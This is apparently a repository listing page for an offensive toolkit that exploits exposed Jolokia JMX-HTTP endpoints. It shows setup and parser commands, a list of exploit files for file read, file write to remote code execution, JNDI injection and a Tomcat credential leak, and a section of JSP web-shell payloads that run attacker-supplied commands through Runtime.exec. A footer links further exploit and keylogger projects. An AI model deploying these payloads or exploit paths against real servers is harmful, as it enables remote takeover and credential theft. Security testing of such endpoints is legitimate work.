Jolokia Exploitation Toolkit (JET) helps exploitation of exposed jolokia endpoints.

Related tags

Security related resourcesjolokia-exploitation-toolkit
Overview

jolokia-exploitation-toolkit

Jolokia Exploitation Toolkit (JET) helps exploitation of exposed jolokia endpoints.

jolokia

Core concept

Jolokia is a protocol bridge that enables users to interact with MBeans (JMB) through HTTP. This endpoint "exposed JMX features" which are often dangerous, this implies that /jolokia should never be exposed, and if used internally (loopback), should be protected by an authentication mechanism.

Doc says... :)

Jolokia is a JMX-HTTP bridge giving an alternative to JSR-160 connectors. It is an agent based approach with support for many platforms. In addition to basic JMX operations it enhances JMX remoting with unique features like bulk requests and fine grained security policies.

Where to find jolokia

  1. Java projects
  2. /jolokia
  3. /actuator/jolokia
  4. ???

Test setup

You can either startup a tomcat server (docker || docker-compose) and install the jolokia war,
Or run docker run --rm -it --net=host bodsch/docker-jolokia and go with the flow ~

Setup & Usage

# Setup with virtualenv
virtualenv -p python3 .venv && source .venv/bin/activate
pip install -r requirements.txt

# Use jolokia-parser.py with remote url
python jolokia-parser.py http://127.0.0.1/jolokia | tee jolokia-parsed.lst
# Use jolokia-parser.py with local json
curl http://127.0.0.1/jolokia/list -o jolokia-list.json
python jolokia-parser.py jolokia-list.json | sed 's#^/jolokia#http://127.0.0.1/jolokia#g' | tee jolokia-parsed.lst

The expected output in jolokia-parsed.lst is the following:

http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor
[+] CLASS : javax.management.MBeanServerDelegate
[+] DESC  : Represents  the MBean server from the management point of view.
[+] DESC  : getRecordingOptions // returns javax.management.openmbean.TabularData
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/getRecordingOptions/$long
[+] DESC  : takeSnapshot // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/takeSnapshot
[+] DESC  : closeRecording // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/closeRecording/$long
[+] DESC  : newRecording // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/newRecording
[+] DESC  : setRecordingSettings // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/setRecordingSettings/$long/$javax.management.openmbean.TabularData
[+] DESC  : openStream // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/openStream/$long/$javax.management.openmbean.TabularData
[+] DESC  : cloneRecording // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/cloneRecording/$long/$boolean
[+] DESC  : setRecordingOptions // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/setRecordingOptions/$long/$javax.management.openmbean.TabularData
[+] DESC  : copyTo // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/copyTo/$long/$java.lang.String
[+] DESC  : startRecording // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/startRecording/$long
[...]

Java & JSP payloads

<%=Runtime.getRuntime().exec(request.getParameter(String.valueOf(42))).getInputStream()%> <%= new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("RESULT").next() %> "> 
<% Runtime.getRuntime().exec(new String[] { "sh", "-c", "cmd" }); %>
<%=Runtime.getRuntime().exec(request.getParameter(String.valueOf(42))).getInputStream()%>
<%= new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("RESULT").next() %>

Contributors & Content

  • @TheLaluka
    • jolokia-parser.py | Convert /jolokia/list or json blob to human-readable urls
    • exploits/file-write-to-rce-vhost-jfr.md | File read and file write to RCE by deploying a vhost with MBeanFactory/createStandardHost and DiagnosticCommand/jfrStart
    • exploits/file-read-compilerdirectivesadd.md | File read with DiagnosticCommand/compilerDirectivesAdd
    • exploits/file-write-to-rce-vmLog.md | File write to RCE with DiagnosticCommand/vmLog
  • @Coiffeur0x90
    • exploits/file-write-to-rce-valve.py | File write with Catalina:host=localhost,name=AccessLogValve (exploit)
    • exploits/file-write-to-rce-valve.md | File write with Catalina:host=localhost,name=AccessLogValve (article)
    • exploits/info-leak-tomcat-creds.py | Tomcat credentials leak with Users:database=UserDatabase,type=UserDatabase
  • @mpgn_x64
    • exploits/jndi-logback.md | XXE to RCE with ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL
  • RicterZ
    • exploits/jndi-injection-MBeanFactory.py | RCE with JNDI Injection (Tomcat EL) with MBeanFactory
  • @lely__
    • exploits/jndi-ldap-target.md | RMI injection with java.lang:type=Memory
  • You should be here? Let me know and I'll fix that!

Sources & References

Owner
Laluka
Black Hat ? Hello no ! Black Cat.
Laluka
GitHub Repository
๐™พ๐š™๐šŽ๐š— ๐š‚๐š˜๐šž๐š›๐šŒ๐šŽ ๐š‚๐šŒ๐š›๐š’๐š™๐š - ๐™ฝ๐š˜ ๐™ฒ๐š˜๐š™๐šข๐š›๐š’๐š๐š‘๐š - ๐šƒ๐šŽ๐šŠ๐š– ๐š†๐š˜๐š›๐š” - ๐š‚๐š’๐š–๐š™๐š•๐šŽ ๐™ฟ๐šข๐š๐š‘๐š˜๐š— ๐™ฟ๐š›๐š˜๐š“๐šŽ๐šŒ๐š - ๐™ฒ๐š›๐šŽ๐šŠ๐š๐šŽ๐š ๐™ฑ๐šข : ๐™ฐ๐š•๐š• ๐šƒ๐šŽ๐šŠ๐š– - ๐™ฒ๐š˜๐š™๐šข๐™ฟ๐šŠ๐šœ๐š ๐™ฒ๐šŠ๐š— ๐™ฝ๐š˜๐š ๐™ผ๐šŠ๐š”๐šŽ ๐šˆ๐š˜๐šž ๐š๐šŽ๐šŠ๐š• ๐™ฟ๐š›๐š˜๐š๐š›๐šŠ๐š–๐š–๐šŽ๐š›

๐™พ๐š™๐šŽ๐š— ๐š‚๐š˜๐šž๐š›๐šŒ๐šŽ ๐š‚๐šŒ๐š›๐š’๐š™๐š - ๐™ฝ๐š˜ ๐™ฒ๐š˜๐š™๐šข๐š›๐š’๐š๐š‘๐š - ๐šƒ๐šŽ๐šŠ๐š– ๐š†๐š˜๐š›๐š” - ๐š‚๐š’๐š–๐š™๐š•๐šŽ ๐™ฟ๐šข๐š๐š‘๐š˜๐š— ๐™ฟ๐š›๐š˜๐š“๐šŽ๐šŒ๐š - ๐™ฒ๐š›๐šŽ๐šŠ๐š๐šŽ๐š ๐™ฑ๐šข : ๐™ฐ๐š•๐š• ๐šƒ๐šŽ๐šŠ๐š– - ๐™ฒ๐š˜๐š™๐šข๐™ฟ๐šŠ๐šœ๐š ๐™ฒ๐šŠ๐š— ๐™ฝ๐š˜๐š ๐™ผ๐šŠ๐š”๐šŽ ๐šˆ๐š˜๐šž ๐š๐šŽ๐šŠ๐š• ๐™ฟ๐š›๐š˜๐š๐š›๐šŠ๐š–๐š–๐šŽ๐š›

CodeX-ID 2 Oct 27, 2022
Log4Shell RCE Exploit - fully independent exploit does not require any 3rd party binaries.

Log4Shell RCE Exploit fully independent exploit does not require any 3rd party binaries. The exploit spraying the payload to all possible logged HTTP

258 Jan 02, 2023
This is a Cryptographied Password Manager, a tool for storing Passwords in a Secure way

Cryptographied Password Manager This is a Cryptographied Password Manager, a tool for storing Passwords in a Secure way without using external Service

Francesco 3 Nov 23, 2022
ThePhish: an automated phishing email analysis tool

ThePhish ThePhish is an automated phishing email analysis tool based on TheHive, Cortex and MISP. It is a web application written in Python 3 and base

675 Jan 03, 2023
Tor Relay availability checker, for using it as a bridge in countries with censorship

Tor Relay Availability Checker This small script downloads all Tor Relay IP addresses from onionoo.torproject.org and checks whether random Relays are

ValdikSS 161 Dec 30, 2022
Auerswald COMpact 8.0B Backdoors exploit

CVE-2021-40859 Auerswald COMpact 8.0B Backdoors exploit About Backdoors were discovered in Auerswald COMpact 5500R 7.8A and 8.0B devices, that allow a

Ashish Kunwar 1 Nov 24, 2022
Workshop Material on VM-based Deobfuscation

Analysis of Virtualization-based Obfuscation This repository contains slides, samples and code of the 4h code deobfuscation workshop at r2con2021. We

Tim Blazytko 133 Dec 18, 2022
Soluciรณn al reto BBVA Contigo, Hack BBVA 2021

Solution Soluciรณn propuesta para el reto BBVA Contigo del Hackathon BBVA 2021. Equipo Mexdapy. Integrantes: David Pedroza Segoviano Regina Priscila Ba

Gabriel Missael Barco 2 Dec 06, 2021
the swiss army knife in the hash field. fast, reliable and easy to use

hexxus Hexxus is a fast hash cracking tool which checks more than 30 thousand passwords in under 4 seconds and can crack the following types bcrypt sh

enigma146 17 Apr 05, 2022
OMIGOD! OM I GOOD? A free scanner to detect VMs vulnerable to one of the

omigood (OM I GOOD?) This repository contains a free scanner to detect VMs vulnerable to one of the "OMIGOD" vulnerabilities discovered by Wiz's threa

Marco Simioni 13 Jul 13, 2022
AutoScan ๆœ‰ๅคšไธช็›ฎๆ ‡ๆ—ถ๏ผŒ่ฐƒ็”จxray+rad่ฟ›่กŒ่‡ชๅŠจๆ‰ซๆ

Usage: ๅœจ้ซ˜็บง็‰ˆXrayๅ’ŒradๅŒ็›ฎๅฝ•ไธ‹่ฟ่กŒ python3 X-AutoXray.py xxxx.txt ๅ†™็š„่›ฎไบบๆ€งๅŒ–็š„ๅ“ฆ๏ผŒos,linux,windows้€š็”จ ็”Ÿๆˆ็š„xrayๆŠฅๅ‘Šไผšๅœจๅฝ“ๅ‰็›ฎๅฝ•็š„/resultไธ‹้ข Ctrl+c ๆ‰“ๆ–ญ่„šๆœฌ่ฟ่กŒๆ—ถ่ฟ˜ๅฏไปฅ็ป“็ฎ—ๆ‰ซๆ่ฟ›ๅบฆ๏ผŒ็”Ÿๆˆๅทฒๆ‰ซๆๅ’Œๆœชๆ‰ซๆ็š„่ฟ›ๅบฆๆ–‡ไปถ๏ผŒ

ๆ–ฏๆ–‡ 73 Jan 01, 2023
IDA scripts for hypervisor (Hyper-v) analysis and reverse engineering automation

Re-Scripts IA32-VMX-Helper (IDA-Script) IA32-MSR-Decoder (IDA-Script) IA32 VMX Helper It's an IDA script (Updated IA32 MSR Decoder) which helps you to

Behrooz Abbassi 16 Oct 08, 2022
S2-062 (CVE-2021-31805) / S2-061 / S2-059 RCE

CVE-2021-31805 Remote code execution S2-062 (CVE-2021-31805) Due to Apache Struts2's incomplete fix for S2-061 (CVE-2020-17530), some tag attributes c

warin9 31 Nov 22, 2022
A Feature Rich Modular Malware Configuration Extraction Utility for MalDuck

Malware Configuration Extractor A Malware Configuration Extraction Tool and Modules for MalDuck This project is FREE as in FREE ๐Ÿบ , use it commercial

c3rb3ru5 103 Dec 18, 2022
An interactive python script that enables root access on the T-Mobile (Wingtech) TMOHS1, as well as providing several useful utilites to change the configuration of the device.

TMOHS1 Root Utility Description An interactive python script that enables root access on the T-Mobile (Wingtech) TMOHS1, as well as providing several

40 Dec 29, 2022
Chapter 1 of the AWS Cookbook

Chapter 1 - Security Set and export your default region: export AWS_REGION=us-east-1 Set your AWS ACCOUNT ID:: AWS_ACCOUNT_ID=$(aws sts get-caller-ide

AWS Cookbook 30 Nov 27, 2022
Multi-Process Vulnerability Tool

Multi-Process Vulnerability Tool

Baris Dincer 1 Dec 22, 2021
PyPasser is a Python library for bypassing reCaptchaV3 only by sending 2 requests.

PyPasser is a Python library for bypassing reCaptchaV3 only by sending 2 requests. In 1st request, gets token of captcha and in 2nd request,

253 Jan 05, 2023
A hashtag check python module

A hashtag check python module

Fayas Noushad 3 Aug 10, 2022
simple python keylogger

HELLogger simple python keylogger DISCLAIMERS: DON'T DO BAD THINGS. THIS PROGRAM IS MEANT FOR PERSONAL USES ONLY. USE IT ONLY IN COMPUTERS WHERE YOU H

Arya 10 Nov 10, 2022